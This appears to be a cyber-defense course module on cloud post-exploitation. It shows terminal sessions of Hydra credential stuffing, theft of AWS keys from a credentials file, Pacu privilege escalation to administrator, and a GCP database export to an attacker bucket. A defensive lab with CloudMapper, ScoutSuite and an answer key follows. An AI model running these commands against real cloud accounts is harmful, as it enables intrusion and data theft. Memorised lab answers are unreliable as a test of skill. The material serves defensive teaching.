Cloud Spotlight: Cloud Post-Exploitation

This course covers ways attackers exploit systems to access data. In this module, we’ll focus on what attackers do after gaining access, including using cloud user credentials.

root@allevil# hydra -t 4 -C credstuffing.txt ssh://192.168.1.73
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-
05 06:06:22
[22][ssh] host: 192.168.1.73 login: jmerckle password: n8jFrErvpQHx
1 of 1 target successfully completed, 1 valid password found

root@allevil# ssh jmerckle@192.168.1.73
Password:
Last login: Mon Jul 5 06:02:08 2021 from 192.168.1.73
~ $ uname -mnrs
Darwin James-MBP.localdomain 20.5.0 x86_64
~ $ cat .aws/credentials
[default]
aws_access_key_id = AKIAJQHVNNNOUYTCFXWT
aws_secret_access_key = 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

In this module, we'll explore how attackers use familiar steps like scanning and exploitation to gain access to cloud resources. We'll assume they've obtained cloud IAM credentials (like AWS credentials) through an attack, and our goal is to learn how they act after gaining access so we can detect and defend against these

Attacker Situation Report

aws sts get-caller-identity

Basic access test, identify username for UserId

aws ec2 describe-instances

Enumerate EC2 instances

aws s3 ls

List S3 buckets

aws lambda list-functions

List Lambda functions

aws iam list-roles

List roles (permissions) associated with the user

aws iam list-users

List other user accounts to target (privesc targets)

aws logs describe-log-groups

Enumerate log groups (what is being monitored?)

root@allevil# aws sts get-caller-identity
{ 
"UserId": "AIDAQ3GCTAHP3NPIF7WKA",
"Account": "058390151647",
"Arn": "arn:aws:iam::058390151647:user/jmerckle" 
}

After finding cloud credentials, an attacker will check their access level using commands to list VMs, storage, serverless functions, users, roles, and logging settings.

The aws sts get-caller-identity command shows who is using AWS. Attackers often use it early to find their username in the ARN field for cloud exploitation.

This shows AWS enumeration using compromised credentials, but the same commands work for Azure and Google Cloud. You can find similar commands in the CloudPentestCheatsheets by Beau Bullock at https://github.com/dafthack/CloudPentestCheatsheets/.

Privilege Escalation Attacks

After checking privileges with stolen credentials, attackers try to get more access by exploiting weak spots in privilege settings or IAM policies.

This AWS policy lets helpdesk operators grant access to cloud assets. However, it's too permissive, allowing them to give any user, even root-level access, because the action and resource are too broad.

The attacker aims to find available privileges and chances to escalate access to cloud resources, including both provider and custom policies.

Pacu: AWS Interrogation and Attack Framework

Pacu is a tool for attacking cloud platforms like AWS, Azure, and Google Cloud. It helps analysts run exploits, escalate privileges, and steal data.

Pacu has several tools to find and use privilege escalation weaknesses. Two helpful tools are iam__enum_permissions and iam__privesc_scan.

root@allevil:~/pacu# ./cli.py
Pacu (jmerckle-falsimentis:No Keys Set) > import_keys jmerckle
Pacu (jmerckle-falsimentis:imported-jmerckle) > run iam__enum_permissions
Running module iam__enum_permissions...
Pacu (jmerckle-falsimentis:imported-jmerckle) > run iam__privesc_scan
Running module iam__privesc_scan...
[iam__privesc_scan] Escalation methods for current user:
[iam__privesc_scan] CONFIRMED: PutUserPolicy
[iam__privesc_scan] Attempting confirmed privilege escalation methods...
[iam__privesc_scan] Successfully added an inline policy named dnr9s7e846!
You should now have administrator permissions.

To start Pacu, run the cli.py script and import the AWS user's keys by specifying the profile name (jmerckle). Pacu will read the AWS credentials from the default location and update the prompt. Then, run iam__enum_permissions to check the permissions for the current keys. After that, run iam__privesc_scan to find and exploit IAM policy weaknesses for privileged access. In this case, Pacu finds a policy with too many PutUserPolicy privileges and uses it to create a new policy that gives admin access.

More Privileges, More Data

After gaining higher access, attackers can reach more data. This includes cloud storage (like AWS S3, Azure, GCP), databases, and virtual machines. They can also access user data in services like Google Drive, OneDrive, and emails.

Attackers might need to change the cloud setup to access data. Some resources can be downloaded directly, but others (like VM snapshots and key storage) often need to be moved to an intermediate storage first. This process increases the chances of detection since the attacker has to modify cloud settings.

Next, we'll look at several examples of tactics and techniques an attacker will use to obtain data from cloud systems.

Cloud Data Exfiltration

root@allevil# gcloud sql instances list
fm-research MYSQL_8_0 us-east1-c db-custom-4-26624 34.138.195.165 - RUNNABLE
root@allevil# gcloud sql databases list -i fm-research
ai utf8 utf8_general_ci
root@allevil# gsutil mb gs://sqlexfil
Creating gs://sqlexfil/...
root@allevil# gsutil acl ch -u jmerckle@falsimentis.com:WRITE gs://sqlexfil
Updated ACL on gs://sqlexfil/
root@allevil# gcloud sql export sql fm-research --database=ai
gs://sqlexfil/sqldump.gz
Exporting Cloud SQL instance...done.
Exported [https://sqladmin.googleapis.com/sql/v1beta4/projects/cryptic-
woods-298720/instances/fm-research] to [gs://sqlexfil/sqldump.gz].
root@allevil# gsutil cp gs://sqlexfil/sqldump.gz .
Copying gs://sqlexfil/sqldump.gz...
- [1 files][ 342.0 MiB/ 342.0 MiB]

Attackers with cloud admin access often target databases for valuable data. Here's how they might do it on Google Cloud Platform:

  1. The attacker finds database instances using gcloud sql instances list and sees a MySQL 8.0 database named fm-research.

  2. They check the database schemas with gcloud sql databases list -i fm-research.

  3. Since they can't download the database directly, they create a storage bucket named sqlexfil.

  4. The attacker gives themselves write access to the bucket using the gsutil acl command.

  5. They then export the fm-research database and schema to the bucket as a file called sqldump.gz.

  6. Finally, the attacker downloads the backup to their local system using gsutil.

The attacker doesn't always need special tools to target the cloud. In this case, they use Google’s gcloud and gsutil tools, which are meant for system admins, to steal database backup info.

As defenders, we can spot this kind of attack in a few ways. Google Cloud Audit Logs help us see the attacker’s actions, like checking databases and making backups. Changes in the attacker’s bucket permissions also create logs we should watch. We should review all buckets to find any unauthorized ones, which could signal an attack.

Attackers can exploit cloud services to find and steal data. For instance, if they gain higher access and become an eDiscovery Manager in Microsoft 365, they can use the compliance search tools to access sensitive information.

Compliance Search is a Microsoft 365 tool that helps auditors see how a company manages data. Attackers can also use it to find important information in Outlook, Teams, and OneDrive by searching for keywords, file types (like "annualreport.pptx"), email details, or sensitive labels (like "Credit Card Number").

Google Cloud Platform and AWS offer data access options similar to Microsoft Compliance Manager, but they're not as well integrated. In Google Workspace, tools like Google Vault, Content Compliance, Audit API, and Gmail delegation let attackers search through browser history, calendars, emails, Google Drive files, Hangouts chats, and more, similar to what Microsoft Compliance Manager does.

Cloud providers allow users to export data. Attackers with admin access can use Google Takeout to get info like location and browser history. This data is useful for them, but it also triggers an email alert to the user, warning them of unauthorized access.

Cloud Post-Exploitation Defenses

To protect against cloud attacks, follow these tips:

  1. Know Your Setup: Identify cloud assets, user permissions, and policies.

  2. Check Permissions and Policies: Ensure policies are strict, limit user access, and apply the Principle of Least Privilege (POLP).

  3. Monitor Logs: Log and watch access and changes to spot unauthorized use.

Next, we’ll discuss tools and tips to help with these recommendations.

AWS: CloudMapper

CloudMapper is a free tool that helps visualize and audit AWS cloud setups. It creates dynamic network maps showing how AWS assets are connected. You can find it at https://github.com/duo-labs/cloudmapper.

$ cloudmapper.py prepare --config config.json --account acctname
$ cloudmapper.py report --config config.json --account acctname
$ cloudmapper.py webserver

To use CloudMapper, you need an AWS account with SecurityAudit and ViewOnlyAccess permissions. You'll also need a JSON file that has the environment name (like "prod"), AWS account ID, and CIDR IP address ranges with names (like "SF Office"). The cloudmapper.py script uses this file to collect data, make a map, and start a web server on TCP/8000 for interaction.

CloudMapper helps check AWS security by finding vulnerabilities, privilege escalations, threats to public assets, and unused resources. For more details, visit https://summitroute.com/blog/2019/03/04/cloudmapper_report_generation/.

CloudMapper is for AWS, but there are other tools for different clouds. Use AzViz for Azure (https://github.com/PrateekKumarSingh/AzViz) and Google Network Topology for Google Cloud (https://cloud.google.com/network-intelligence-center/docs/network-topology). Cloudcraft can map multiple clouds with both manual and automated options (https://www.cloudcraft.co/).

ScoutSuite (AWS, GCP, Azure)

CloudMapper helps visualize cloud environments for assessment, while ScoutSuite focuses on finding vulnerabilities. It works with AWS, Google Cloud, Azure, Oracle Cloud, and Alibaba Cloud, using special access for thorough assessments. ScoutSuite produces an HTML report and a JSON report with the findings.

ScoutSuite has hundreds of rules for finding cloud vulnerabilities in its free version. There’s also a freemium version with extra scanning features and a paid version with more detailed analysis and reporting.

The HTML report from ScoutSuite is easy to use, but the JSON results are also helpful for finding vulnerabilities. For instance, the JSON files can reveal sensitive environment variables, as shown in the example below.

$ tail +2 scoutsuite_results_aws-pseudovision.js | jq '.services.awslambda.regions[].functions[] | select (.env_variables != []) | .arn,.env_variables'
"arn:aws:lambda:us-east-1:058390151647:function:AlexaWhatDayIsIt"
{
"app_secret": "swXQICPRRkftVYtVsmzE"
}

You can find more helpful JQ queries for ScoutSuite scan results in Beau Bullock's Cloud Pentest Cheatsheets project at this link: https://github.com/dafthack/CloudPentestCheatsheets/blob/master/cheatsheets/OtherTools.md

Cloud Logging

Logging setup varies by platform and organization. Check your cloud provider's documentation for specific logging recommendations, but also keep in mind some general tips.

Store your logs in a separate cloud account's write-only bucket. This way, even if someone has access to your main account, they can't change the logs. If you need logs for your main account, make sure to copy them to the second account for analysis.

Cloud logging should have:

  • Netflow logs for cloud connections (source, destination, port, protocol, packet and byte counts, start and end times)

  • Cloud storage access logs (timestamp, requester IP, action, response, response size)

  • Logs of all API access attempts for sensitive resources (with response status)

  • Logs of failed API requests for non-sensitive resources.

Use your cloud provider's tools to watch and manage your logs. Amazon Detective, Azure Sentinel, and GCP Security Command Center help you quickly analyze logging data for threat hunting and incident response.

Log file retention is a debated issue. Some believe logs should be kept for 30-90 days, but legal requirements can change this. Keeping logs too long can complicate analysis. It's best to keep logs as long as they're useful. Before deleting old logs, consider moving them to cheaper, offline storage like Amazon Glacier or Google Cloud Storage Archive.

Lab 5.6: Cloud Configuration Assessment

In this lab, we will evaluate the Falsimentis AWS cloud assessment data generated by CloudMapper and ScoutSuite.

This lab focuses on defense and helps us review cloud configuration scans from CloudMapper and ScoutSuite. Both tools assess configuration vulnerabilities, but they have different features and support different cloud providers. By using both, we'll learn to choose the best tool for our cloud assessment needs.

CloudMapper is configured using a Python virtual environment. To use CloudMapper, let's activate the Python virtual environment using the source command.

source venv/bin/activate

In this lab, we've set up the Falsimentis network config for CloudMapper. First, let's check the config.json file using the cat command.

cat config.json

The CloudMapper config file gives friendly names to network numbers and includes the AWS account ID and name. This account ID matches the AWS CLI credentials file.

cat ~/.aws/credentials

To use CloudMapper, we need an AWS account with SecurityAudit and ViewOnlyAccess permissions. After setting the account ID in the config.json file and adding our AWS CLI credentials, we'll run this command: python3 cloudmapper.py collect --config config.json to gather the needed information.

python3 cloudmapper.py collect --config config.json

CloudMapper data is saved in /opt/cloudmapper/account-data with the profile name as a folder. Let's use ls to check the directory with the Falsimentis data.

ls account-data/
ls account-data/falsimentis/

Next, we'll prepare the data for analysis and inspection by running the CloudMapper prepare function,.

python3 cloudmapper.py prepare --config config.json

Now that the cloud configuration data is ready, we can begin reviewing the information.

CloudMapper was made to show how devices in a network are connected. To view the network data, let's use the CloudMapper webserver function.

python3 cloudmapper.py webserver

Let's open Firefox and go to http://127.0.0.1:8000. After a few seconds, we'll see a network map like the example shown.

The network diagram shows how endpoints are connected, grouped by AWS region, with labels based on the config.json settings. It includes several AWS Virtual Private Servers (VPS) and Virtual Private Clouds (VPC) across different availability zones in the us-west-1 region (like us-west-1a and us-west-1c).

The Welcome to CloudMapper window lets us see more info about the different nodes in AWS. Let's click on the Dev Webserver node and expand the Details row for more information.

Let's look at the details row for the selected node and answer the following questions.

1) What is the public IP address of the selected node?

Answer: 13.57.56.39

2) What is the instance type for the node?

Answer: t2.micro

3) What is the name of the security group controlling network access to the node?

Answer: morning-ssh-http

4) What sensitive information is disclosed in the DB Server 1 node tags?

The Tags section of the DB Server 1 node has key/value pairs, including an AWS access key and secret key. Developers often use tags to send information to the VM, which can include sensitive keys.

Let's close the Firefox tab with CloudMapper results and go back to the terminal. Press CTRL+C to stop the CloudMapper web server and get back to the command prompt.

CloudMapper can create a network map and an assessment report. To generate the report, we'll use the CloudMapper report command in the terminal.

python3 cloudmapper.py report --config config.json --accounts falsimentis

Let's open the CloudMapper report in Firefox.

firefox web/account-data/report.html

In Firefox, let's go to the Public network resources section of the report. CloudMapper will show the public resources by type. For Falsimentis, there are 9 EC2 instances listed.

The bar chart shows how many public resources are allocated to different port ranges in security groups.

Public resources are divided into four groups based on port ranges. The first two groups allow access to TCP ports 22 and 80. The third group includes access to TCP ports 22 and 4444, often linked to Metasploit. The last group covers a wider range, including port 80 and ports 443 to 4443, which may be a typo that mistakenly allows more ports than intended.

CloudMapper finds weaknesses in AWS settings, like a vulnerability scanner, but only looks at the configuration, not the actual assets. Let's check the "Links to findings" section in the CloudMapper report for details.

5) Which user does not have MFA configured?

Answer: falsimentis

CloudMapper provides helpful visuals but doesn’t offer a detailed security report and has limited ability to spot problems. To improve on what CloudMapper provides, we'll also look into ScoutSuite, a tool for assessing cloud configurations across multiple platforms.

The ScoutSuite data for this lab has already been collected.

The ScoutSuite report is in /home/sec504/labs/scoutsuite-report/aws-912182608192.html. Let's open it in Firefox as shown.

firefox /home/sec504/labs/scoutsuite-report/aws-912182608192.html

ScoutSuite reviewed various services for the cloud provider in the Falsimentis report. It found high-risk issues in EC2 and IAM, and medium-risk issues in S3 and VPC.

6) Which users are granted IAM PassRole policy privileges?

In the IAM findings, we see that the "Managed Policy Allows 'iam ' For All Resources" identifies the users cannets, fpracall, and mrawes as having access to this privileged policy through the AWSElasticBeanstalk policy.

Answer: cannets, fpracall, and mrawes

7) Which VPC subnet is not configured to use a flow log?

Answer: Dev Webserver, Unprovisioned Wombat instances

ScoutSuite generates a JSON file along with the HTML report, containing extra findings. This file can help us access more details not shown in the report. We can find the JSON report in the ~/labs/scoutsuite-report/scoutsuite-results folder. Let's go to that directory and list the files.

The ScoutSuite report is a .js file with the first line assigning the scan results as a JSON to the scoutsuite_results variable. We can view the first 40 characters of the scan result using the head command.

head -c 40 scoutsuite_results_aws-912182608192.js ; echo

To use JQ to read the JSON results, we need to skip the first line of the JavaScript file. We can do this using the tail command.

tail -n +2 scoutsuite_results_aws-912182608192.js | jq '.' | more

Using JQ to parse ScoutSuite results, we can target specific data. For instance, the JQ query here helps us view all tags for EC2 instances.

tail -n +2 scoutsuite_results_aws-912182608192.js | jq '.services.ec2.regions[].vpcs[].instances[] | .name, .Tags'

8) What non-AWS key value is disclosed in the EC2 instance tag values?

tail -n +2 scoutsuite_results_aws-912182608192.js | jq '.services.ec2.regions[].vpcs[].instances[] | .name, .Tags'

In this lab, we examined two cloud assessment tools: CloudMapper (for AWS) and ScoutSuite (for multiple providers). Both tools help assess cloud configurations, but they present information differently and offer varying levels of security analysis.

We can use these tools to check the cloud environment and see how its assets are set up and if they have any security weaknesses. In the lab, we looked at the Falsimentis AWS setup and found some risks that could harm the network.

Last updated